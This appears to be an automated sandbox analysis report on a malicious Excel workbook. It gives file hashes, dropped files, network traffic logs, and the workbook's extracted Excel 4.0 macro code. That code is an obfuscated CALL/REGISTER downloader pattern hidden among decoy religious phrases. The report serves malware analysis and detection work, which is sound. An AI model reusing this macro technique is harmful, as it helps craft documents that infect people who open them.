                                                                                                                                                                                                          Preview: L..................F.... ....&..w...-...w...-...w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....4R[...Public..f......L.4R[.....................<.....%..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....\.2.....4R[. .94101.xls.D......4R[.4R[......g.....................q..9.4.1.0.1...x.l.s.......H...............-.......G...........>.S......C:\Users\Public\94101.xls..".....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.9.4.1.0.1...x.l.s..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F.... ....&..w...-...w...-...w..........
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=4096, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1638
                                                                                                                                                                                                          Entropy (8bit):4.615034736056573
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8oGY8As7RvbeY7aB6mymY8As7RvbeY7aB6m:8oGEspeNB6pmEspeNB6
                                                                                                                                                                                                          MD5:47102BACE3474FBE97079BC6D79823C1
                                                                                                                                                                                                          SHA1:3DBCE86153AE20A1649D3B9B0DFA2BF18BD4973E
                                                                                                                                                                                                          SHA-256:D70F591B72F3F7D0763CFD32BA187CEE3B7F2EE543FE70CF3EAF89DA73FCF0A3
                                                                                                                                                                                                          SHA-512:10494FED4541E1624CC245FA7A1C21AA91897472919828748D774B4A729C108CB21F431CD11470D7D9E330C0407562D378F0DBBEA71A8CAB62E47BCC9D808A3A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: L..................F...........,........w....;..w...........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Nlv..Public..f......L.4RN.....................<......o2.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......>...............-.......=...........>.S......C:\Users\Public........\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F...........,....h...w....;..w...........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):265
                                                                                                                                                                                                          Entropy (8bit):4.3340256268217745
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:mrSmxWIMovKd2mxWIMovKd2tYrSmxWIMovKd2Z0d2mxWIMovKd2mMEyUZUmxWIMn:mrXolYrXByjU5jo
                                                                                                                                                                                                          MD5:94F404D8D23AEA4AFF120EEC82456785
                                                                                                                                                                                                          SHA1:3DA76C3DB78AD0C7CE88DB0BBA7844AC4EF73689
                                                                                                                                                                                                          SHA-256:F37B29A831D0F5B53C8AFC3F05BE0F0BFF66940B0A6CE07A402FCF23BA0EE05C
                                                                                                                                                                                                          SHA-512:713E45614E2126E2EFDD715125B73246AFA9457AF83BAABE1EB9BDEF614EA7CA387D3DC958BC22A7177C0620B64730BB07513071ADB79D13D4E1B476DBCAAF00
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: Public.LNK=0..[misc??????]..94101.txt.LNK=0..[misc??????]..94101.txt.LNK=0..Public.LNK=0..[misc??????]..94101.txt.LNK=0..94101.txt.LNK=0..[misc??????]..94101.txt.LNK=0..[xls]..94101.xls.LNK=0..94101.xls.LNK=0..[misc??????]..94101.txt.LNK=0..[xls]..94101.xls.LNK=0..
                                                                                                                                                                                                          C:\Users\user\Desktop\~$Presentation_812525.xlsb
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:Microsoft Excel 2007+
                                                                                                                                                                                                          Entropy (8bit):7.918106536317746
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                                                          • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                                                          File name:Presentation_812525.xlsb
                                                                                                                                                                                                          File size:141137
                                                                                                                                                                                                          MD5:4ddace9347c434a749eab40a211e6628
                                                                                                                                                                                                          SHA1:c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
                                                                                                                                                                                                          SHA256:796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7
                                                                                                                                                                                                          SHA512:baf696a31c34abead6f036d112abcf05cc50ce3aacf6a01dc2123d36bedfe19a6efbe695f1be6640bbbd96d40ce5d9a52c4abc00cd11e56618a5e0af6e6d7751
                                                                                                                                                                                                          SSDEEP:3072:KsUtFARPULAZemMA5uAgz3xQGarpjTTT5xI65LfsJM+LYtSP9Oo0Hj:iFAeErgzBQGWTTT5GYsJzlh0D
                                                                                                                                                                                                          File Content Preview:PK..........!....w............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Document Type:OpenXML
                                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                                          OLE File "Presentation_812525.xlsb"

                                                                                                                                                                                                          Indicators

                                                                                                                                                                                                          Has Summary Info:
                                                                                                                                                                                                          Application Name:
                                                                                                                                                                                                          Encrypted Document:
                                                                                                                                                                                                          Contains Word Document Stream:
                                                                                                                                                                                                          Contains Workbook/Book Stream:
                                                                                                                                                                                                          Contains PowerPoint Document Stream:
                                                                                                                                                                                                          Contains Visio Document Stream:
                                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                                          Contains VBA Macros:

                                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                                          CALL(Sheet3!A16, Sheet3!A18, Sheet3!A20, 0, Sheet3!A22, Sheet3!D14, Sheet3!G16, 0, 0)
CALL(Sheet3!A16, Sheet3!A18, Sheet3!A20, 0, Sheet3!A22, Sheet3!D14, Sheet3!G17, 0, 0)

                                                                                                                                                                                                          "=IF(718,718)"They THAt BEliEvE in ThE EverLaSTinG GOD shAlt BE IMmuNe To tHE seWER SYsTem; tHEy SHAlT DISPel evIL And ViCe"=SAVE.AS(Sheet3!O14, 3)""For the lOrd HATh Not GiVen uS ThE spiRIT oF WICkEDNEss, bUT of AMaZIngnesS anD moRAlitY"=SAVE.AS(Sheet3!K14)"=CALL(Sheet3!A16,Sheet3!A18,Sheet3!A20,0,Sheet3!A22,Sheet3!D14,Sheet3!G16,0,0)"tHEy THaT hOnoR thE LORD tHy goD sHalt ResToRe ThEir BeNeVOleNce; thEY ShALt DrIVE AwAY dEPrAviTY"=WAIT(NOW() + ""00:00:04"")""=CALL(Sheet3!A16,Sheet3!A18,Sheet3!A20,0,Sheet3!A22,Sheet3!D14,Sheet3!G17,0,0)""THE lOrd HATh noT GiveN uS THe SpirIt oF kNaVERy, BUT OF DiSCERNMENt and COUrAgE""=WAIT(NOW() + ""00:00:03"")""=REGISTER(Sheet3!A16,Sheet3!A18,Sheet3!A20,""IONIC"",,1,9)""thuS saItH THe HOlY one: OPEn YE nOt wAGonS FuLl of soup, BuT CANisTERs oF HaRdwarE""=IONIC(0,Sheet3!A22,Sheet3!D16,Sheet3!W14,0,0)"Wait uPon God And THoU shALt IncrEASe tHY TWitTer foLLowerS; THOU ShAlT BE sHelTERED FrOM The CaNCer"THE lOrd HATh noT GiveN uS THe SpirIt oF kNaVERy, BUT OF DiSCERNMENt and COUrAgE"=HALT()

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.905359030 CET4970780192.168.2.3172.104.129.156
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.945818901 CET8049707172.104.129.156192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.946058989 CET4970780192.168.2.3172.104.129.156
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.946541071 CET4970780192.168.2.3172.104.129.156
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.986762047 CET8049707172.104.129.156192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.114121914 CET8049707172.104.129.156192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.115041018 CET4970780192.168.2.3172.104.129.156
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.268888950 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.400657892 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.400757074 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.422996998 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.554898977 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555179119 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555218935 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555258989 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555279970 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555344105 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.605525017 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.739885092 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.739993095 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.752823114 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.887064934 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.887105942 CET4434970874.6.143.26192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.887331963 CET49708443192.168.2.374.6.143.26
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.951636076 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:06.958050966 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.037060022 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.037198067 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.037870884 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.116806030 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117310047 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117355108 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117407084 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117408991 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117448092 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117459059 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.124439955 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.203977108 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.204356909 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.205620050 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.324485064 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.517105103 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.517153025 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.517189026 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.517282963 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.517326117 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586086988 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586128950 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586169004 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586185932 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586194992 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586224079 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586230993 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.586236000 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940412998 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940459967 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940499067 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940535069 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940594912 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940644979 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.940653086 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.055763960 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.055871964 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.119328976 CET8049707172.104.129.156192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.119544029 CET4970780192.168.2.3172.104.129.156
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.144344091 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.144433975 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148195028 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148238897 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148267984 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148303986 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148315907 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148343086 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148344040 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148382902 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148391008 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148402929 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148432016 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148473978 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.148489952 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.149300098 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.155889034 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.156054020 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.223479033 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.223536015 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.223586082 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.223635912 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227440119 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227504969 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227539062 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227549076 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227555037 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227586031 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227597952 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227624893 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227662086 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227663994 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227674007 CET49709443192.168.2.387.248.100.215
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227700949 CET4434970987.248.100.215192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:08.227705002 CET49709443192.168.2.387.248.100.215

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Jan 20, 2021 14:02:40.681618929 CET5128153192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:40.732732058 CET53512818.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:41.795507908 CET4919953192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:41.845181942 CET53491998.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:43.126589060 CET5062053192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:43.183353901 CET53506208.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:45.822568893 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:45.873802900 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:49.493114948 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:49.542717934 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:50.388561010 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:50.436666965 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:50.530416012 CET5598453192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:50.590902090 CET53559848.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:51.033606052 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:51.091487885 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:52.039164066 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:52.138084888 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:53.050940037 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:53.107415915 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:55.051754951 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:55.108205080 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:02:59.066931009 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:02:59.114831924 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.215615988 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.901232958 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.949115038 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:13.794539928 CET6349253192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:13.845712900 CET53634928.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:15.721915007 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:15.782583952 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:21.812840939 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:21.873447895 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:23.026597023 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:23.074505091 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:29.076965094 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:29.137697935 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:30.141554117 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:30.189591885 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:31.078130007 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:31.126086950 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:32.005850077 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:32.053778887 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:32.942610979 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:32.990757942 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:33.197078943 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:33.264554024 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:33.929008007 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:33.976886034 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:34.733159065 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:34.781172991 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:35.691313028 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:35.742115974 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:36.509150982 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:36.557162046 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:37.564043045 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:37.611978054 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:38.544559002 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:38.592483044 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:39.489290953 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:39.537440062 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:40.461086035 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:40.511987925 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:48.399868011 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:48.450670004 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:03:53.929368973 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:03:53.987190962 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:04:25.584712982 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:04:25.632740021 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                                          Jan 20, 2021 14:04:27.183922052 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                                          Jan 20, 2021 14:04:27.256119967 CET53606338.8.8.8192.168.2.3

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.215615988 CET192.168.2.38.8.8.80x5a9Standard query (0)yahoo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.901232958 CET192.168.2.38.8.8.80xe5d6Standard query (0)www.yahoo.comA (IP address)IN (0x0001)

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com74.6.143.26A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com74.6.231.21A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com74.6.143.25A (IP address)IN (0x0001)
